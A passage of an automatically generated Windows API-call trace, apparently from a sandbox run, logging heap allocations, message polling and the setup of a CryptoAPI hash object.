wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0188.588] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0188.588] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0188.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0188.588] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0188.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0188.589] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.589] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0188.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0188.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0188.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0188.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0188.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.598] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.598] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0188.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.599] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.599] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.599] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.599] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0188.599] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.599] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0188.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0188.599] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.600] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.600] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0188.600] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0188.600] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.600] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0188.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.601] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.601] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0188.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0188.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0188.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0188.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0188.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0188.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50ad0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0188.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.601] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0188.602] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0188.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0188.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0188.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.605] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0188.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0188.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.606] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 